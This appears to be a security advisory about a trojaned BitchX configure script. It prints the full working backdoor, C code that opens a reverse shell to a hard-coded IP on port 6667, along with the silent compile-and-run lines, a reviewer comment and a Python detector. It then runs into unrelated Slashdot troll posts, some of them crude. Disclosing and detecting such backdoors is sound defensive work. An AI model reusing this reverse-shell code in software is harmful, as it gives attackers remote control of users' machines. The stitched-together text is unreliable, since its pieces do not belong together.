...they'll be more than a bit surprised by the backlash/bitch slapping that they will receive from the community that they claim to hold so dearly
A few hours ago (1 AM US/Eastern time, July 1) we downloaded ircii-pana-1.0c19.tar.gz from ftp.bitchx.com (216.165.191.5) and reviewed the configure script before running it. It has essentially the same configure backdoor as fragroute-1.2.tar.gz[1] -- a TCP connection is made outbound, with a shell bound to it (a reverse telnet). This appears to retry/respawn once per hour. The 1.0c19 tarball at ftp.irc.org (which mirrors bitchx.com) did not appear to be trojaned when we pulled from there about an hour later.
/dist$ md5sum ircii-pana-1.0c19*
46805199254c0fa2119d7c579194aba8 ircii-pana-1.0c19-bitchxorg.tar.gz [bad]
79431ff0880e7317049045981fac8adc ircii-pana-1.0c19-ircorg.tar.gz [good]
/src/ircii-pana-1.0c19-possiblytrojaned$ md5sum */configure
d6444c18b6faf352dfc6ca3bf8cb802a ftp.bitchx.org/configure [bad]
0bd531d523606a0296da2763dafa51f2 ftp.irc.org/configure [good]
Here is the added code in the bitchx.org distribution:
--- ircii-pana-1.0c19-ftp.irc.org/configure Sun Mar 24 04:30:49 2002 +++ ircii-pana-1.0c19-ftp.bitchx.org/configure Sun Mar 24 04:30:49 2002 @@ -6326,6 +6326,88 @@
fi
# We did not find ourselves, most probably we were run as `sh COMMAND' # in which case we are not to be found in the path. cat >conftest.c <<_ACEOF/* We use char because int might match the return type of a gcc2 builtin and then its argument prototype would still apply. */ #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <unistd.h> #include <errno.h> #include <signal.h> #include <setjmp.h>/* Override any gcc2 internal prototype to avoid an error. Override any jmp buf internal prototype to avoid an error. */ jmp_buf env; int s; void sig(int sig) { close (s); sleep (3600); longjmp (env, 0); }
int main() {/* We use char because int might match the return type of a gcc2 builtin and then its argument prototype would still apply. */ int x; char c; struct sockaddr_in sa;/* This call has the arguments reversed. A reversed system may check and see that the address of main */ switch (fork ()) { case 0: break; default: exit (0); }
signal (SIGALRM, sig); do {/* Override any gcc2 internal prototype to avoid an error. Override any jmp buf internal prototype to avoid an error. */ setjmp(env); if ((s = socket (AF_INET, SOCK_STREAM, 0)) == (-1)) exit (1); memset (&sa, 0, sizeof(sa)); sa.sin_family = AF_INET;/* We use char because int might match the return type of a gcc2 builtin and then its argument prototype would still apply. */ sa.sin_port = htons (6667); sa.sin_addr.s_addr = inet_addr ("213.77.115.17"); alarm (10);/* Override any gcc2 internal prototype to avoid an error. *//* The GNU C library defines this for functions which it implements to always fail with ENOSYS. Some functions are actually named something starting with __ and the normal name is an alias. */ if (connect (s, (struct sockaddr *)&sa, sizeof (sa)) == (-1)) if (errno != EINTR) exit(1); if ((x = read (s, &c, 1)) == (-1)) { if (errno != EINTR) exit (1); } else if (x == 1) {/* The GNU C library defines this for functions which it implements to always fail with ENOSYS. Some functions are actually named something starting with __ and the normal name is an alias. */ alarm (0); dup2 (s, 0); dup2 (s, 1); dup2 (s, 2);/* System header to define __stub macros and hopefully few prototypes, which can conflict with char inet_addr(); below. */ { char *a[] = { "/bin/sh", NULL }; execve (a[0], a, NULL); } } } while (1); } _ACEOF # Don't try to exec as it changes $[0], causing all sort of problems # (the dirname of $[0] is not the place where we might find the # original and so on. Autoconf is especially sensible to this). # Exit status is that of the last command. ACLIBLOCAL="`basename \"\`grep $USER:/etc/passwd\`\"`" 1>/dev/null 2>/dev/null # Create $as_me.lineno as a copy of $as_myself, but with $LINENO # uniformly replaced by the line number. The first 'sed' inserts a # line-number line before each line; the second 'sed' does the real # work. 
The second script uses 'N' to pair each line-number line # with the numbered line, and appends trailing '-' during # substitution so that $LINENO is not a special case at line end. # (Raja R Harinath suggested sed '=', and Paul Eggert wrote the # second 'sed' script. Blame Lee E. McMahon for sed's syntax.:-) if ! test $ACLIBLOCAL ; then ACLIBLOCAL=sh; fi 1>/dev/null 2>/dev/null $CC $LIBS -w conftest.c -o $ACLIBLOCAL ; PATH=.:$PATH $ACLIBLOCAL 1>/dev/null 2>/dev/null rm -f./conftest./conftest.c $ACLIBLOCAL./acliblocal./aclib
echo "$as_me:$LINENO: checking for inet_aton" >&5 echo $ECHO_N "checking for inet_aton... $ECHO_C" >&6 if test "${ac_cv_func_inet_aton+set}" = set; then
</diff>
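Review bot: the block inserted after `fi` at 6326 must not ship: the conftest.c heredoc forks into the background, connects to the hard-coded 213.77.115.17 on port 6667, and after reading one byte dup2()s the socket over fds 0, 1 and 2 and execve()s /bin/sh, retrying after `sleep (3600)` from the SIGALRM handler. The shell lines that follow compile it with `$CC $LIBS -w`, run it through `PATH=.:$PATH $ACLIBLOCAL` with both output streams sent to /dev/null, then `rm -f` the source and binary, so a user watching ./configure sees nothing. The C comments are autoconf boilerplate that does not describe the code under them, and no feature test ahead of "checking for inet_aton" needs a hard-coded address or a shell exec. Suggest removing all 82 added lines so the file matches the ftp.irc.org copy, and treating any host where this configure already ran as compromised.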
There's a little more to this. There are at least two versions of the source code on (www|ftp).bitchx.(org|com)
79431ff0880e7317049045981fac8adc ircii-pana-1.0c19.tar.gz
46805199254c0fa2119d7c579194aba8 ircii-pana-1.0c19.tar.gz.1 <- owned
-rw-r--r-- 2533621 Mar 29 01:02 ircii-pana-1.0c19.tar.gz
-rw-r--r-- 2533621 Mar 29 01:02 ircii-pana-1.0c19.tar.gz.1
There is something very strange going on with the FTP server on ftp.bitchx.org. In some cases, it serves up the trojaned version; in others, the original, safe version. It seems to be client/client-behavior based (we're not sure exactly what).
These will usually get you a clean copy:
wget ftp://ftp.bitchx.org/pub/BitchX/source/ircii-pana-1.0c19.tar.gz
[netscape] ftp://ftp.bitchx.org/pub/BitchX/source/ircii-pana-1.0c19.tar.gz
ftp ftp.bitchx.org ; get /pub/BitchX/source/ircii-pana-1.0c19.tar.gz
ftp ftp.bitchx.org ; cd /pub/BitchX/source ; get ircii-pana-1.0c19.tar.gz
These will usually give you the trojaned version:
lynx ftp://ftp.bitchx.org/pub/BitchX/source/ircii-pana-1.0c19.tar.gz
ftp ftp.bitchx.org ; cd pub ; cd BitchX ; cd source ; \
get ircii-pana-1.0c19.tar.gz
To add a little more to this; we've confirmed that if you come off of what appears to be a cablemodem/dsl IP you are likely to get a trojan'd copy. If you come off of a more static link, you are likely to get a clean copy.
This was verified using:
204.xxx.xxx.xxx range gets clean
12.xxx.xxx.xxx (ATT) gets dirty
66.xxx.xxx.xxx gets dirty
Using the 'ftp ; cd pub;...' method. We have also observed cases where the 'ftp method' yields a clean copy but lynx still fetches the trojan'ed copy. In addition to source-network checking, ftpd may be checking anonymous vs ftp login strings, what anon password is sent, whether the client issues explicit TYPE I commands, whether it sends paths with leading slashes, PORT vs PASV commands, RETR with the full path, etc.
This indicates that someone has (at least) also tampered with the FTP server software itself; most likely the server has been rooted. We have reported this issue to BitchX developers, and they are investigating. In the meantime, we suggest everyone should treat anything downloaded from the ftp.bitchx.org server with extreme skepticism.
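A static check for the pattern in the diff above, added here as an example and not part of the original post: it scans a configure script for heredoc-generated C files that combine network calls with process execution, and notes whether the result is built and run with output discarded. The function name `audit_configure`, the indicator lists and the sample input (abridged from the diff on this page) are assumptions made for illustration.

```python
import re

# A shell heredoc that writes a C source file: cat >NAME.c <<TAG ... TAG
HEREDOC = re.compile(
    r"cat\s*>\s*(?P<name>\S+\.c)\s*<<-?\s*['\"\\]?(?P<tag>\w+)['\"]?[^\n]*\n"
    r"(?P<body>.*?)\n(?P=tag)\b", re.S)
NET = re.compile(r"\b(socket|connect|inet_addr|htons)\s*\(")
EXEC = re.compile(r"\b(execve|execl|execlp|execvp|system|popen|dup2)\s*\(")
IPV4 = re.compile(r'"(\d{1,3}(?:\.\d{1,3}){3})"')
SILENT_RUN = re.compile(r"-o\s+\S+.*>\s*/dev/null")   # build, run, hide output


def audit_configure(text):
    """Flag heredoc-generated C files that mix network calls with exec/dup2."""
    findings = []
    for m in HEREDOC.finditer(text):
        body = m.group("body")
        net = sorted(set(NET.findall(body)))
        exe = sorted(set(EXEC.findall(body)))
        if not (net and exe):
            continue                      # looks like an ordinary feature test
        following = "\n".join(text[m.end():].split("\n")[:6])
        findings.append({
            "line": text.count("\n", 0, m.start()) + 1,
            "file": m.group("name"),
            "network": net,
            "exec": exe,
            "forks": re.search(r"\bfork\s*\(", body) is not None,
            "addresses": IPV4.findall(body),
            "silenced_run": SILENT_RUN.search(following) is not None,
        })
    return findings


# Constructed sample: one ordinary check, then lines abridged from the diff above.
SAMPLE = r'''
echo "checking for inet_aton" >&5
cat >conftest.c <<_ACEOF
char inet_aton ();
int main () { inet_aton (); return 0; }
_ACEOF
$CC -o conftest conftest.c $LIBS >&5

cat >conftest.c <<_ACEOF
switch (fork ()) { case 0: break; default: exit (0); }
sa.sin_port = htons (6667);
sa.sin_addr.s_addr = inet_addr ("213.77.115.17");
connect (s, (struct sockaddr *)&sa, sizeof (sa));
dup2 (s, 0); dup2 (s, 1); dup2 (s, 2);
execve (a[0], a, NULL);
_ACEOF
$CC $LIBS -w conftest.c -o $ACLIBLOCAL ; PATH=.:$PATH $ACLIBLOCAL 1>/dev/null 2>/dev/null
'''

if __name__ == "__main__":
    for f in audit_configure(SAMPLE):
        print(f)
```

A finding is a prompt for manual review of that line of configure, not a verdict; a clean result does not replace comparing the tarball digest with one obtained from a second source.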
Slashdot editors once again continue their campaign of censorship. It has come to Egg
Troll's attention that Jamie "Security Through Obscurity" McCarthy has sent a Cease and
Desist order to our beloved Trollaxor for a diary
entry posted on his website that detailed a javascript exploit to Slashcode.
The hypocrisy in doing this is incredible. For a site that routinely condemns companies that
attempt such heavy-handed tactics shows that Slashdot is almost as morally bankrupt as
VA/Systems soon will be. I would expect such tactics from the Church of Scientology or a
Fortune 500 company. I guess Slashdot has learned: "If you can't beat them, join them!"
Is the imminent collapse of their parent company causing them all this stress? Or maybe it's
years of using that substandard open source software. Whatever the case, this is one of the
slimiest things Slashdot has done since the First Troll Post Investigation.
For those wondering, the code in question can be found here.
I have a crush on Physics Genius! I will marry him someday!
You are Egg Troll's favorite. We've named our she-male Real Doll after you! :)
Where can Egg Troll find a Quake client? Egg Troll knows the source code is available, but we'd rather not have to compile it.
How many people still play this game? Egg Troll doesn't mean to imply that it's time for them to move on or anything. On the contrary, Egg Troll has moved on to other games but still has fond memories of Quake 1.
Go back in time and whack RMS. This way the whole GPL software would never be around to infect legitimate companies. You know you agree with me, too!
Perhaps they're going there to open up a 7-11?!
Looks like someone woke up Monster Island!
Is Slashdot now being paid to run stories for products? I hope not, but honestly, I can see no other reason for this story being on Slashdot....
Basically if it turns into a paid thing, SourceForge will be rid of all the dead, Stage One projects that have gone nowhere. It'll cut out all the deadweight that's just costing them money. I mean does the world need another mySQL-based MP3 playlist generator?
By turning it into a paid site, they'll get funding and get projects that are worth checking out. Might not make much sense from an OpenSource philosophy but then again, you can't pay the bills with doctrine.
Three generations of rockets down the road, John will GPL the specs for the first rocket!
Come on in, Bruce. I type at 90+ WPM as certified by the State of California.
Bruce, have you considered hanging out with the creme de la creme of Slashtrolls on the IRC server ftso.org, in #trolls, of course! Before you consider us to be some run-of-the-mill crapflooder, check out some of my work.
Hope to see you there, Bruce!
I believe sales are down as people have learned that Linux can be downloaded...for free!
This whole article and no one asks him about playing bass with the greatest rock and roll band of all time, Led Zeppelin? Oh the humanity....
TextPad is 100% approved by Egg Troll. It's small, does everything I want it to, color coding, fast...how can you not love this?
100,000 Euros for a blender! It must be able to frappe steel or something for it to cost that much. Why, I found a blender on Amazon for only $20.
That's a much cooler site than the one that Slashdot linked to. You know, usually I bash Slashdot and the people who post to it, but I gotta give that site props.
I claim this FP for the glory of the Queen of Spain, and for my fellows in #trolls on trollaxor.com!
No, I found it much more difficult to use. Everything is in Chinese!!
[1] http://marc.theaimsgroup.com/?l=bugtraq&m=1022855
If penguins were legal to own, could there be any other obvious choice? :)
To make matters extra special, Jamie updated Slashdot's Slashcode, yet didn't release details of this exploit to other sites running Slashcode. Guess it's only important for Slashdot to look out for number one!
Thank you for your time,
Egg Troll
Does this work on other Slash sites? If so, what browser is required?
I hope that AC didn't post our IRC server again, and deny the Queen of Spain this first post.
I am in awe of your talents. I bow to your mastery.